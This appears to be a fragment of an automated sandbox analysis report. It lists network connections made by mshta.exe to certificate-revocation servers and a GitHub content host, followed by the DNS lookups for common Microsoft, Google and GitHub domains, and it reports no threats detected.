680
mshta.exe
104.18.38.233:80
ocsp.comodoca.com
CLOUDFLARENET
unknown
680
mshta.exe
172.64.149.23:80
ocsp.comodoca.com
CLOUDFLARENET
US
unknown
680
mshta.exe
185.199.108.133:443
objects.githubusercontent.com
FASTLY
US
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.104.136.2
unknown
google.com
  • 142.250.185.142
unknown
crl.microsoft.com
  • 23.48.23.162
  • 23.48.23.174
  • 23.48.23.166
  • 23.48.23.177
  • 23.48.23.155
  • 23.48.23.178
  • 23.48.23.167
  • 23.48.23.161
  • 23.48.23.169
unknown
github.com
  • 140.82.121.4
unknown
ocsp.comodoca.com
  • 104.18.38.233
  • 172.64.149.23
unknown
ocsp.usertrust.com
  • 104.18.38.233
  • 172.64.149.23
unknown
ocsp.sectigo.com
  • 172.64.149.23
  • 104.18.38.233
unknown
objects.githubusercontent.com
  • 185.199.108.133
  • 185.199.110.133
  • 185.199.109.133
  • 185.199.111.133
unknown
login.live.com
  • 40.126.31.131
  • 40.126.31.129
  • 20.190.159.128
  • 40.126.31.1
  • 40.126.31.0
  • 40.126.31.71
  • 40.126.31.3
  • 20.190.159.131
unknown
client.wns.windows.com
  • 40.113.110.67
unknown

Threats

No threats detected
No debug info